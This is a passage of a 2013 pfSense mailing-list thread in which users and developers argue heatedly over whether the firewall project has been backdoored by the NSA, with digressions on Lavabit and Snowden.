On Oct 9, 2013, at 7:41 PM, Thinker Rix thinke...@rocketmail.com wrote: We all know that the governments currently force on a daily base one company after the other to comply to their New World Order-Orwellian-global-surveillance phantasies and make them compromise their software or service. So I find it absolutely NECESSARY to clear out if pfSense has fallen (already) to them, or not. Network security is THE major reason for using pfSense. So it should be the most important question for all of us, isn't it? By my comprehension, everyone who says that this is a silly question or that it is some unimportant thought no one should further bother thinking about in detail, is either confused, or trying to conceal something. You just want to have a discussion. Perhaps it makes you feel important, I don’t know. Your Alex Jonesian “New World Odor” rhetoric is tiring. Your NECESSARY discussion is not, because in the end analysis the discussion you want to have is orthogonal to the subject. You should instead only depend on you and your tools to ensure your security. Asking me (or Chris, or Jamie) to answer the question puts everyone in a position where nothing can be learned, so it is useless, rather than NECESSARY. Until you understand and accept this, your messages are mere platitudes. Look, The integrity and bravery Ladar Levison has shown in his fight is impressive. He has definitely earned enough cred to restart his business outside the US and be very successful, but my hope is that he does not. We should celebrate Ladar for making the decision to put himself at risk in order to protect his users, but I think we should be careful not to forget that Ladar was forced to make that decision because the security of Lavabit was all a complete and total hand wave. There are already technologies such as PGP, S/MIME, smart cards, and the dozens of other ways we can have secure email without relying on a trusted third party such as Lavabit. 
Lavabit could respond to a demand for plaintext, if Ladar were willing to do so (and in the end, he was, for a particular user); on the other hand, Google cannot give anyone access to the plaintexts of S/MIME encrypted messages that I send through their servers because of technical barriers. That is the point of doing your encryption locally, and that is why security and privacy are not, and never will be, a service.(*) This wasn't untested water, either. The exact same thing happened to Hushmail in 2007 for the exact same reason, and should have been evidence enough that the model isn't viable, even for a non-US company. http://www.wired.com/threatlevel/2007/11/encrypted-e-mai/ So again, I think we should definitely support Ladar as a person, but we also need to be careful not to confuse that with supporting Lavabit, (the company) which was a very real danger that should never be repeated again (again). How you interpret this and subsequently apply it to ESF and/or pfSense is up to you. Jim (*) if you think about it for very long, it also shows that Snowden is not the Ür-hacker than the press wants to make him. His communications via Lavabit only gave the appearance of security, and he wasn’t smart enough to understand same. ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On 2013-10-09 19:42, Adam Thompson wrote: Argh. Anyone who answered Yes to your question (correctly, mind you) would immediately be committing a federal crime. Considering the consequences, no-one in their right mind would ever confirm that they had been approached or received a NSL. Well, some people do, because they have principles and values and prefer to not bow to any suppressors; for example Ladar Levison of Lavabit (https://en.wikipedia.org/wiki/Lavabit). He could just have complied and he would still run his company today - offering encrypted email to his customers, that in reality is not really encrypted anymore; but he chose to stand up and blow the whistle. Great guy. Regards Thinker Rix
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
To answer your question about throwing the first stone. Your question reads a bit like the Are you a criminal/commie? questions. Many people would object to the question at the start because it implies that the people being asked the question has done something wrong. Watching the reactions to political debates shows that asking the question can be enough to get a sizable amount of the audience to think the answer is yes, even when no proof is ever given that something happened. Then when the question was deleted, you demanded that pfSense take a stand on it. Let me show you what it looks like from the other side: Have you planned to overthrow the government? When will you show that you are not plotting to kill your fellow country men? It is a simple question, when will we here something from you? I just ask because I want to be sure that you are not trying to kill me. For the tool in question, pfSense, once you start questioning it, there is no way to get the bottom without eithering trusting the pfSense people (which means that the question is pointless because if you trust them, asking them if they have violated your trust means that you don't trust them) or getting an external validation (trusting another group of people or doing the work yourself). FYI, there is a long history on the Internet of people asking simple innocent question, not to get actually answers, but to cause trouble by causing the effect described at the beginning of my email (these are called trolls). Walter On Wed, Oct 9, 2013 at 11:31 AM, Thinker Rix thinke...@rocketmail.comwrote: On 2013-10-09 20:22, Jim Thompson wrote: On Oct 9, 2013, at 7:13 PM, Thinker Rix thinke...@rocketmail.com wrote: Hello Jim! On 2013-10-09 19:50, Jim Thompson wrote: IMO, this bullshit thread only serves to assist those asking the question in stroking their own ego. This is already the second time that you insult me indirectly. It’s amusing that you don’t understand that you threw the first stone here. 
This is correct. I do not understand where I am supposed to have thrown any stones or insult anybody, indeed. If you would like to show me, I would really be thankful. May I ask again if you are a staff member of Electric Sheep Fencing LLC? Staff members get paid. I’m a co-owner, and have never taken a dime from ESF (or BSDP). jim Thank you for the info. Regards Thinker Rix -- The greatest dangers to liberty lurk in insidious encroachment by men of zeal, well-meaning but without understanding. -- Justice Louis D. Brandeis
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Wed, Oct 09, 2013 at 07:17:25PM +0200, Jim Thompson wrote: Sorry, this is not BS. The situation has changed, and we have to adapt. The situation did not change with the Snowden revelations. Anyone following along has known what was going on for at least the last decade. The difference is between having a theory, or having it confirmed by evidence. The disclosures changed the confidence level of a large number of people, some of the cryptographers, security professionals, or in general people concerned with opsec, and forced them into finally doing something. That is a net good thing. At the very least, we'll get a lot more of hardened systems overall, especially where it matters. The only thing that has changed is that now outrage has become popular. Outrage by itself is useless, unless it's an amplifier, and results in political action, or at least increases the activism background. How many of you people now questioning pfSense understand that Edward Snowden despised classified leaks in back in 2009, and that he was not always the champion of transparency that he has apparently become. Thank you for this information. It doesn't really matter about the origins of the leaks, or the motivation behind it, true or professed, just the end result. ArsTechnica published IRC chats where he railed against a New York Times story about the U.S. rejecting an Israeli request for aid to attack an Iranian nuclear site and the United States' covert efforts to sabotage Iran's nuclear program. Are they TRYING to start a war? Jesus christ. they're like wikileaks, he said in the chat. they're just reporting, dude, said another user. moreover, who the fuck are the anonymous sources telling them this? he said. those people should be shot in the balls. Snowden, in the chat, also criticized reporting on classified information: is it unethical to report on the government's intrigue? asked a user in the chat. VIOLATING NATIONAL SECURITY? no. he responded. meh. national security. 
responded the user. Um, YS.that shit is classified for a reason, he said. it's not because oh we hope our citizens don't find out. it's because this shit won't work if iran knows what we're doing. I am so angry right now. This is completely unbelievable, Snowden said. http://arstechnica.com/tech-policy/2013/06/exclusive-in-2009-ed-snowden-said-leakers-should-be-shot-then-he-became-one/3/ It doesn’t contribute anything to the project. It clarifies a few things. Please don't knee-jerk about it, this is not going to improve things in any way. So “be a pussy” is your answer to handle this? No need to know. I don't know on what kind of the fence you are, but you're being a part of the project, and it's important to meet the right tone when responding to inquiries, even if you consider them meritless. ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On 2013-10-09 20:16, Gé Weijers wrote: I think it's unlikely that ESF was even asked to cooperate, but I don't believe a denial is all that useful under the circumstances, and asking for it again and again is obnoxious. Having thought about it again and again, I would like to feedback to you that your act of calling it obnoxious to pose a simple question about if a security software project is still secure or has been undermined by the government already, seems to be a clear indication of self-censorship... Self-censorship is what you get, when you suppress peoples by surveillance..
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
You got your answer of no a while back. But you're still talking. What are you going to do with the answer now that you have it? What's YOUR plan? -Ian On Wed, Oct 9, 2013 at 2:55 PM, Thinker Rix thinke...@rocketmail.com wrote: On 2013-10-09 20:16, Gé Weijers wrote: I think it's unlikely that ESF was even asked to cooperate, but I don't believe a denial is all that useful under the circumstances, and asking for it again and again is obnoxious. Having thought about it again and again, I would like to feedback to you that your act of calling it obnoxious to pose a simple question about if a security software project is still secure or has been undermined by the government already, seems to be a clear indication of self-censorship... Self-censorship is what you get, when you suppress peoples by surveillance..
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Wed, Oct 09, 2013 at 07:53:24PM +0200, Jim Thompson wrote: Also, the source of git would also reveal a problem when examined. To get around that one starts hypothesizing the sort of globe-spanning conspiracy against which one might as well give up (well, maybe all my compilers (not just gcc, all of them) are also backdoored to backdoor themselves, and each other if you cross-compile, then backdoor git too...”). Yeah, we know our Ken Thompson and about the (known) attempted backdoor insertions. pfSense is based on FreeBSD. What if FreeBSD was backdoored by the NSA or other? How would you know? pfSense is a great deal more than FreeBSD. If you want to reduce the attack surface, or just amount of machinery to review, less is definitely more. /tmp/rules.debug is small enough to eyeball and deploy somewhere else. That else will be increasingly involving really open hardware, and compartments formally verified (see seL4 Co). See? just useless ego stroking, and a lot of resultant heat, rather than solutions to problems. Can we get back to pfSense now? I'm interested into building a trustable network tap, to get a good feel of what goes on my networks. Apart from the usual mirrored switch port (and reliance on whatever the firmware is professing it is doing) how can pfSense help me with that? It used to have a transparent bridge mode, is that still in there somewhere?
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On 2013-10-09 22:11, Ian Bowers wrote: You got your answer of no a while back. But you're still talking. What are you going to do with the answer now that you have it? What's YOUR plan? -Ian - Well, actually it was not so long ago that I got a clear answer - Commonly I talk as much as I like to - I still don't know what to do with the answer - I have no plan Thinker Rix
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On 10/9/13 11:56 AM, Thinker Rix wrote: 1. Recently they forced the small encrypted-email-service Lavabit to comply with them (hand out their SSL-masterkeys install a black-box at their premises). Lavabit did not agree - and they shut him down. Actually they didn't shut him down. Per news reports and the founder's statements. You can read the details and facts if you want. David
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
Hi Walter, On 2013-10-09 21:53, Walter Parker wrote: To answer your question about throwing the first stone. Your question reads a bit like the Are you a criminal/commie? questions. Many people would object to the question at the start because it implies that the people being asked the question has done something wrong. Watching the reactions to political debates shows that asking the question can be enough to get a sizable amount of the audience to think the answer is yes, even when no proof is ever given that something happened. Interesting what all kinds of different things you do interpret into my question. By my comprehension I just asked simple but important question and did this quite straight-forwardly. Then when the question was deleted, you demanded that pfSense take a stand on it. Yes. Censorship always raises questions. Let me show you what it looks like from the other side: Have you planned to overthrow the government? When will you show that you are not plotting to kill your fellow country men? It is a simple question, when will we here something from you? I just ask because I want to be sure that you are not trying to kill me. Well, your example neglects one important aspect: pfSense is a kind of security software project. Asking it about it's level of security and integrity is a question that such a project must stand, IMHO. It is like asking a bank how safe my money is. Or asking Microsoft how good Word is for writing letters; while asking me about if I plan to overthrow some government or kill other people refers to nothing. For the tool in question, pfSense, once you start questioning it, there is no way to get the bottom without eithering trusting the pfSense people (which means that the question is pointless because if you trust them, asking them if they have violated your trust means that you don't trust them) or getting an external validation (trusting another group of people or doing the work yourself). 
I guess for anybody related to computer security it is a must to question anything anytime and take nothing for granted. You should question everything any time and any player in this domain should accept any questions any time, IMHO. FYI, there is a long history on the Internet of people asking simple innocent question, not to get actually answers, but to cause trouble by causing the effect described at the beginning of my email (these are called trolls). What trouble do you refer to? I only read some aggressive/ snappy answers which - frankly - I find pretty awkward reactions to my simple question. Regards Thinker Rix ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
Is ideas on how to secure yourself and your network the sort of thing you're looking for? A plan or a sense of direction, something like that? Because you've been focusing on things that do achieve these ends. How can the pfSense community help you solve your pfSense related problem, or was it just a question you had that has since been answered? -Ian On Wed, Oct 9, 2013 at 4:14 PM, Thinker Rix thinke...@rocketmail.com wrote: On 2013-10-09 22:11, Ian Bowers wrote: You got your answer of no a while back. But you're still talking. What are you going to do with the answer now that you have it? What's YOUR plan? -Ian - Well, actually it was not so long ago that I got a clear answer - Commonly I talk as much as I like to - I still don't know what to do with the answer - I have no plan Thinker Rix
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
All,

Can this flame be put to an end or continued via private mail? This endless discussion would be reason for me to unsubscribe and that's not the goal of the list i guess.

Regards,
Pim
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
But, your initial question was not "What level of security and integrity is provided by pfSense?" or "How do judge the safety and security of pfSense?" Your question was "Has pfSense been compromised by Big Brother?"

In the context of your Bank question it reads more like "Have you been robbed yet?" or "Are you working with crooks?" and not "How safe is my money?" For Microsoft it reads "How broken is Word", not "How good is Word?" Or closer to the question "Are you in bed with the NSA", not "How safe are Word documents from others?"

Most people are happy to engage in questions of the form "Tell about what your product does to solve/fix the problem?" and consider questions of the form "Have you sold out to the NSA?" or "How broken is your product?" to be insulting.

I ask you "How broken are you?" It is a simple question, what is your response? Do you feel at all insulted by that question?

You seem to be missing the idea that the context of the question matters. Do some research on the phrase "Have you stopped beating your wife yet?" and tell me if you would be upset if someone asked you that question.

Walter

--
The greatest dangers to liberty lurk in insidious encroachment by men of zeal, well-meaning but without understanding. -- Justice Louis D. Brandeis
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On 2013-10-09 23:43, Pim van Stam wrote:
> All,
>
> Can this flame be put to an end or continued via private mail? This endless discussion would be reason for me to unsubscribe and that's not the goal of the list i guess.
>
> Regards,
> Pim

Hi Pim,

first of all: Generally - sorry for disturbing you.

But: Interpreting your message, I guess you are participating at this mailing list with a mail reader that just pours all incoming mail into one folder - which is not the proper way to read mailing lists.

Please let me inform you that it is highly advisable to participate at mailing lists only with a mail reader that allows you to view incoming mail in threaded mode. This way you only get to read messages that interest you, instead of being flooded by all messages of all users with all subjects.

Not using such a threaded-capable reader but telling others what to write and what not because you are bored about what they discuss is not really a solution :-)

A reader that is capable of threaded view mode is e.g. Mozilla Thunderbird (View > Sort by > Threaded)

Regards
Thinker Rix
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Thu, 10 Oct 2013 00:05:22 +0300 Thinker Rix thinke...@rocketmail.com wrote:
> Well, actually I started this thread with a pretty frank, straight-forward and very simple question.

That's right and they were justified.

BTW, you pushed to the corner the (un)famous American hubris (Obama: US is exceptional.), that's the nasty answers from some.

Thinker Rix, you are not alone at your unease pressing you to ask those questions about pfSense and NSA.

Regards to all.
Przemysław Pawełczyk

--
Home network based on pfSense 2.1.
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
@Chris L

i am not responsible, if you didn't get it.

if one comes to me with worries about a completely free open source system by using a Closed Source SHIT. this is ridiculous

He should first consider his Closed Source Shit. Now i find also his nick misleading, he should name NON-Thinker! he should make his name a honor by doing himself the favor and use his brain.

Get this out of the pfSense lists. This is a support list and not a philosophers corner what everything is bad in the world. SUPPORT LIST for pfSense. GET IT

just to point it out: ppl. who are supporting closed source software are also supporting the NSA and all the other kind of shit.

As long as one uses closed source software he should shut the fuck up.
As long as one uses the internet he should shut the fuck up.
As long as one uses TCP/IP he should shut the fuck up.
As long one is using Smartphones, Credit-Cards, Onlinebanking, Online-shops and so on shut the fuck up.

if one cannot understand why:
Internet - invented by DARPA
TCP/IP - invented by DARPA
RSA encryption - financed by DARPA/NSA/Government

alternatives: invent a new internet including a new internet protocol and all the stuff around it.

otoh he is too late. he missed the important points. the leaked information about Xkeysystem are from 2005 or 2008, huuuhaa and now they all whine. if your holyness mr snowden wouldn't be such a hero, you wouldn't even know, care or worry about it. so this is entirely ridiculous.

one more time. where are you been as it was important to care about it? eh? at the times we warned the people, nobody would listen and called us those who warned them: paranoid.

everyone uses high technologized stuff without to have any clue about how this works, if ppl. like us told them: learn this stuff, it can be dangerous the answer was: naahh thats not important, i know what i am doing. you are paranoid, nobody would ever do so.

i see. and now they come and whine ...pah *lol*

this has nothing to do with head meet sand. may be, your head should get out of the sand.

ridiculous. this entire thematics is ridiculous.

= = = http://michael-schuh.net/ = = =
Projektmanagement - IT-Consulting - Professional Services IT
Rev. Michael Schuh
Ordained Dudeist Priest http://dudeism.com/
Postfach 10 21 52
66021 Saarbrücken
phone: 0681/8319664
@: m i c h a e l . s c h u h @ g m a i l . c o m
= = = Ust-ID: DE251072318 = = =

2013/10/10 Chris L c...@viptalk.net
> On Oct 9, 2013, at 9:06 PM, Michael Schuh michael.sc...@gmail.com wrote:
>> ridiculous
>
> Head, meet sand.
>
> Then again, consider the country of origin. They have a history of not recognizing naked tyranny and evil until it's far too late. They will be in good company with all the apologists for the current American surveillance state.
>
>> vvv
>> From: Thinker Rix thinke...@rocketmail.com
>> User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20130801 Thunderbird/17.0.8
>>
>> 2013/10/10 Chris Buechler c...@pfsense.org
>>> On Wed, Oct 9, 2013 at 9:20 AM, Thinker Rix thinke...@rocketmail.com wrote:
>>>> Dear pfsense-team,
>>>>
>>>> today I posted the following on your blog at http://blog.pfsense.org/?p=712
>>>>
>>>> “Worried User Says: Your comment is awaiting moderation. October 9th, 2013 at 7:55 am
>>>> Hi guys, I want to ask if you have been approached by any US government officials, such as NSA, FBI, etc. and been asked/ forced to include any backdoors, spyware, loggers, etc. into pfsense and if you did so. Thank you Worried User”
>>>>
>>>> Some minutes later I could see that my entry was not released to the public - but deleted by the moderator, without any further comment.
>>>
>>> Not true, the comment was moderator approved. The only reason we have moderation at all is because spam significantly outnumbers legit comments and we don't want any spam on any of our sites, there isn't some vast conspiracy going on.
>>>
>>> No, we have not been approached by anyone to backdoor or otherwise compromise security of the project, at any point during our 9 year history. I have indeed met with the NSA in person related to the product of one of our rebrand customers a couple years back, one of their groups was interested in evaluating the product. It survived their security analysis quite well (at least from what they declassified and